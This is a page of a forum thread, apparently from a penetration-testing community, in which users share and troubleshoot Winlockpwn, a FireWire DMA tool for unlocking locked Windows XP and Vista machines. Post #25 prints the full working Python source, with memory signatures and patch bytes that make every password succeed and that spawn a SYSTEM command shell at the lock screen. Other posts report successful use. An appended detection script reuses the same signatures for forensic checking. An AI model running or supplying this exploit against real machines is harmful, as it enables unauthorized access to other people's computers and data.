Page 3 of 5
Results 21 to 30 of 46

Thread: Tutorial Winlockpwn

  1. #21
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    williamc,

    I haven't used the code yet as I don't have the equipment at home. I will try it next week when I go to the lab in the university. But I guess that it should work with the drivers I installed, if the signature and the offset are correct. I will post next week when I have some results.

    Atanas

  2. #22
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I installed those drivers and it didn't resolve the problem. Actually, it made the iPod not even register as a connection in FireWire devices! I attempted to do a system restore but it failed too.

    I'm looking forward to your results!

    William

  3. #23
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    I performed some tests today but had no luck. I see the iPod in the Device Manager, but if I log out and initiate winlockpwn, it starts searching for the signature, reaches the end offset and outputs an error message. Strange. If I have time tomorrow I'll test further.

    Atanas

  4. #24
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    2

    Default

    Could the folks that have captured additional (i.e., non-iPod) FireWire ROM CSRs post them here for others to test?

    Also, someone posted earlier about alternative iPod drivers that worked for the attack against Vista. But the link is dead. Can you describe how to find that driver?

    My interest here is testing how the DMA attack vector interacts with BitLocker. I'm currently decrypting a BitLockered Vista system to verify that Aza's (of Moonloop) patch of the Vista msv1_0.dll works when patched by hand. Will post results later.

    Yep, I can confirm that Aza's winlockpwn patch for Vista works when manually patching msv1_0.dll. So I'm right where this thread left off before I joined in: finding a FireWire driver combination that allows read-write over DMA on Vista.

  5. #25
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Updated Winlockpwn to support Vista and XP SP3.

    Code:
    #!/usr/bin/python
    # Windows locked screen remote firewire unlockor
    # Metlstorm 2k6
    # Uh, private use only, not for public distro, kthx.
    
    import sys
    import firewire
    import binascii
    import time
    
    VER=1.6
    VERSTR="Winlockpwn v%s Metlstorm, 2k6. <metlstorm@storm.net.nz>" % VER
    
    # Targets are dicts, with some properties, and one or more phases
    # each phase specifies a signature which can be found at one or more
    # page offsets. When a signature is found the patch is applied at patchoffset
    # bytes from the beginning of the signature. 
    
    targets=[{
    		"name":"WinXP SP2 Fast User Switching Unlock",
    		"notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
    		"phase":[{
    		"sig":"8BD8F7DB1ADBFEC3",
    		"pageoffset":[2905],
    		"patch":"bb01000000eb0990",
    		"patchoffset":0}]
    		},
    		{"name":"WinXP SP2 Unlock",
    		"notes":"When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
    		"phase":[{
    		"sig":"0502000010",
    		"pageoffset":[3696],
    		"patch":"b801000000",
    		"patchoffset":0}]
    		},
    		{"name":"WinXP SP2 msv1_0.dll technique",
    		 "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too! This is the best allround XPSP2 technique.",
    		 "phase":[{
    		 "sig":"8BFF558BEC83EC50A1",
    		 "pageoffset":[0x927],
    		 "patch":"B001",
    		 "patchoffset":0xa5}]
    		},
    		{"name":"WinXP SP3 msv1_0.dll technique",
    		"notes":"Patches the call which decides if an account requires password authentication. Page Offset signature changed from SP2.",
    		"phase":[{
    		"sig":"8BFF558BEC83EC50A1",
    		"pageoffset":[0x81B],
    		"patch":"B001",
    		"patchoffset":0xa5}]
    		},
    		{"name":"Windows Vista msv1_0.dll technique",
    		"notes":"Patches the call which decides if an account requires password authentication. Signature and offsets changed with Vista.",
    		"phase":[{
    		"sig":"8BFF558BEC81EC88000000A1A4",
    		"pageoffset":[0x76A],
    		"patch":"B001",
    		"patchoffset":0xBD}]
    		},
    		{"name":"WinXP SP2 utilman cmd spawn",
    		 "notes":"At the winlogon winstation (locked or prelogin), will spawn a system cmd shell. Start util manager with Win-U, and make sure all the disability-tools are stopped (narrator starts by default). Then run this, wait till it's patched a couple of data-phase things, then start narrator. Enjoy a shell. You can use this with the msv1_0.dll technique as well, and log in. Any time you want to get back to your shell, just lock the desktop, and you'll go back to the winlogon winstation where your shell will be waiting.",
    		 "phase":[
    		 {"name":"Patch code",
    		 "sig":"535689bde8faffffff158810185b898540fbffff39bd40fbffff744e8b8524fb",
    		 "pageoffset":[0x39f],
    		 "patch":"565383c310899de8faffffff158810185b898540fbffff9090909090",
    		 "patchoffset":0x0},
    		 {"name":"Patch data",
    		 "sig":"2f0055004d000000d420185b0539185b0000000053006f006600740077006100",
    		 "pageoffset":[0x9ac, 0x5ac, 0x3ac],
    		 "patch":"63006d0064002e006500780065000000570069006e0053007400610030005c00570069006e006c006f0067006f006e0000",
    		 "patchoffset":0x0,
    		 "keepgoing":True,
    		 }
    		 ]
    		}
    		]
    
    
    start = 0x8000000L
    end   = 0xffffffffL
    chunk = 4096 
    
    print VERSTR
    
    def printTargets(targets):
    	i = 1
    	print " Available Targets:"
    	for t in targets:
    		print " %2d: %s" % (i, t["name"])
    		i+=1
    	print "\nTarget Notes:\n"	
    	for t in targets:
    		print "%s:\n---------------\n%s\n" % (t["name"], t["notes"])
    		
    def usage():
    	print "Usage: winlockpwn port node target [start-end]"
    	print " - Port and node are the firewire port and node numbers. Use businfo to identify your targets port and node numbers."
    	print " - Target should be one of the numbered targets listed below."
    	print " - You can optionally supply a start-end memory range to search for signatures in, useful if you're restarting, or want to limit the upper end of memory (which will otherwise walk up to 4GB without stopping). This understands anything sensible; eg 0-100M, 0xffff-0x1ffff, 1m-, 200k-1GB, -0xffff."
    	print "(Remember that you'll need to use CSR trickery with romtool to talk DMA to windows.)\n"
    	printTargets(targets)
    	sys.exit(1)
    
    if len(sys.argv) < 4:
    	usage()
    
    try:
    	port = int(sys.argv[1])
    	node = int(sys.argv[2])
    	targetno = int(sys.argv[3])
    	if len(sys.argv) > 4:
    		start,end = firewire.parseRange(sys.argv[4])
    		if end == None:
    			end = 0xffffffffL
    except ValueError:
    	usage()
    
    if targetno < 1 or targetno > len(targets):
    	usage()
    
    target = targets[targetno -1]
    
    print "Target Selection:"
    print " Name   : %s" % target["name"]
    print " Notes  : %s" % target["notes"]
    for p in target["phase"]:
    	if p.has_key("name"):
    		print "Phase: %s" % p["name"]
    	print " Pattern: 0x%s" % p["sig"]
    	print " Offset : %s" % p["pageoffset"]
    	print " Patch  : 0x%s" % p["patch"]
    	print " Offset : %d" % p["patchoffset"]
    print "Scanning Options:"
    print " Start  : 0x%x" % start
    print " Stop   : 0x%x" % end
    print " Pagesz : %d" % chunk
    
    # Sanity-check every phase (the original checked only the last phase,
    # because 'p' was left over from the print loop above).
    for p in target["phase"]:
    	for so in p["pageoffset"]:
    		if len(p["sig"]) + so > chunk:
    			print "Uh oh, signature crosses page boundary. This isn't supported :("
    			sys.exit(1)
    		if so + p["patchoffset"] > chunk:
    			print "Uh oh, patch offset crosses page boundary. This isn't supported :("
    			sys.exit(1)
    
    
    
    print "Init firwire, port %d node %d" % (port, node)
    h = firewire.Host()
    n = h[port][node]
    
    print "Snarfin' memories..."
    sys.stdout.flush()
    
    dumppage = False
    won = False
    
    startt = time.time()
    last = 0
    for p in target["phase"]:
    	try:
    		print "Phase: %s" % p["name"]
    	except KeyError:
    		pass
    	signatureoffset=p["pageoffset"]
    	eviloffset = p["patchoffset"]
    	payload = binascii.unhexlify(p["patch"])
    	pattern = binascii.unhexlify(p["sig"]) 
    	eviladdr = None
    	for offset in range(start, end, chunk):
    		now = time.time()
    		if now > (last + 1):
    			last = now
    			print "\rChecking for signature on page at 0x%08x (%dkB) at %d kB/s..." % (offset, offset / 1024, (offset - start) / (now - startt) / 1024 ),
    			sys.stdout.flush()
    
    		for so in signatureoffset:
    			mem = n.read(offset + so , len(pattern))
    			if mem == pattern:
    				print "Found signature at 0x%08x" % (offset + so)
    				eviladdr = offset + so + p["patchoffset"]
    				if dumppage:
    					fo = open("winlockpwn.dumppage.0x%08x" % offset, "w")
    					fo.write(n.read(offset, chunk))
    					fo.close()
    				break
    		if eviladdr != None:
    			won = True
    			print "Setting up teh bomb...",
    			n.write(eviladdr, payload) 
    			print "Donezor!"
    			verify=n.read(eviladdr, len(payload))
    			print "Verified evil: 0x%s" % (binascii.hexlify(verify))
    			if dumppage:
    				fo = open("winlockpwn.dumppage.0x%08x.patched" % offset, "w")
    				fo.write(n.read(offset, chunk))
    				fo.close()
    			if p.has_key("keepgoing") and p["keepgoing"]:
    				eviladdr = None
    			else:
    				break
    
    
    if won:
    	print "You may proceed with your nefarious plans"
    else:
    	print "\nOh noes, you didn't win"
    endt = time.time()
    print "Elapsed time %d seconds" % (endt - startt)
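    An added example, not part of the thread or of the tool above: a read-only check an incident responder could run over a raw memory image (or one of the tool's own 4096-byte dump-page files) to see whether the msv1_0.dll signature from the target table is present and whether the bytes at the patch offset already hold the tool's patch value. It reuses only the XP SP3 and Vista entries from the table above; the two-page sample image is constructed here for the demonstration.

```python
PAGE = 4096

# Target entries copied from the tool's table above (XP SP3 and Vista
# msv1_0.dll techniques); only the fields a read-only check needs are kept.
TARGETS = [
    {"name": "WinXP SP3 msv1_0.dll", "sig": "8BFF558BEC83EC50A1",
     "pageoffset": [0x81B], "patch": "B001", "patchoffset": 0xA5},
    {"name": "Windows Vista msv1_0.dll", "sig": "8BFF558BEC81EC88000000A1A4",
     "pageoffset": [0x76A], "patch": "B001", "patchoffset": 0xBD},
]


def scan_image(image, targets=TARGETS, page=PAGE):
    """Walk a raw memory image page by page and report every page where a
    target signature sits at its expected page offset. Each hit records
    whether the bytes at the patch offset already equal the patch value,
    i.e. whether the function looks like it has been patched in memory."""
    hits = []
    for t in targets:
        sig = bytes.fromhex(t["sig"])
        patch = bytes.fromhex(t["patch"])
        for so in t["pageoffset"]:
            # Same constraint the tool enforces: nothing may cross a page boundary.
            if so + len(sig) > page or so + t["patchoffset"] + len(patch) > page:
                raise ValueError("%s: offsets cross page boundary" % t["name"])
            for base in range(0, len(image) - page + 1, page):
                if image[base + so:base + so + len(sig)] != sig:
                    continue
                at = base + so + t["patchoffset"]
                hits.append({"target": t["name"], "page": base, "patch_addr": at,
                             "patched": image[at:at + len(patch)] == patch})
    return hits


def build_sample_image(patched):
    """Constructed two-page image: page 0 is NOP filler, page 1 carries the
    XP SP3 signature at 0x81B and, if requested, the patch bytes at +0xA5."""
    img = bytearray(b"\x90" * (2 * PAGE))
    sig = bytes.fromhex(TARGETS[0]["sig"])
    img[PAGE + 0x81B:PAGE + 0x81B + len(sig)] = sig
    if patched:
        img[PAGE + 0x81B + 0xA5:PAGE + 0x81B + 0xA5 + 2] = bytes.fromhex("B001")
    return bytes(img)


if __name__ == "__main__":
    for hit in scan_image(build_sample_image(patched=True)):
        print(hit)
```

    A hit with "patched": True in a memory image taken from a locked workstation is a strong indicator that this kind of DMA patch was applied; a hit with False only shows that the signature is present where the table expects it.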

  6. #26
    Member
    Join Date
    Mar 2010
    Posts
    123

    Default

    Thank you for the guide - however something's gone wrong. [with me this is normal]

    The error I get is:

    bt ~ # cd pythonraw1394
    bt pythonraw1394 # make
    swig -shadow -python -I/usr/local/include/libraw1394 raw1394.i
    /usr/local/include/libraw1394/raw1394.h:1244: Error: Syntax error in input(1).
    make: *** [raw1394.py] Error 1
    bt pythonraw1394 #


    My MakeFile is :
    Code:
    .PHONY=all clean dist
    
    all: raw1394.py _raw1394.so
    
    _raw1394.so: raw1394_wrap.c /usr/local/include/python2.3
            $(CC) -Wall -shared -fPIC -I/usr/local/include/python2.3 -I/usr/include/libraw1394 raw1394_wrap.c  -$
    
    raw1394_wrap.c: raw1394.py
    
    raw1394.py: raw1394.i
            swig -shadow -python -I/usr/local/include/libraw1394 raw1394.i
    
    clean:
            -rm raw1394.py
            -rm raw1394.pyc
            -rm _raw1394.so
            -rm raw1394_wrap.c
            -rm pythonraw1394.tar.gz
    
    dist: clean
            tar czf pythonraw1394.tar.gz -C.. --exclude=\.\* pythonraw1394/Makefile pythonraw1394/README pythonr$

    Have I borked it completely?

    Thanks in advance

  7. #27
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Hmm, not sure what you're doing wrong. I notice you're using Python 2.3. Have you tried following the instructions on the first page with the 2.5 method? Let us know.

    William

  8. #28
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    Tested on Windows XP SP2 and SP3 and it works fine. I just got a problem with Vista: once it starts surfing the memory, after a few seconds it detects the error "resource busy", as previously posted.

    Also tested with the network login on XP SP2 and it worked great!

  9. #29
    Member
    Join Date
    Mar 2010
    Posts
    123

    Default

    OK, I crossed that hurdle.

    Now I am at the point where I have to reference /usr/local/include/python2.5 in the other scripts - but I can't see any obvious places to put the reference into.

    It's getting late so I will have another look again tomorrow. Thank you for the 2.5 pointer.

  10. #30
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Vista will work for a few seconds, at which point you will get a resource busy error. As I previously requested, if anyone has a FireWire device other than an iPod, please use romtool to create a CSR file.

    William
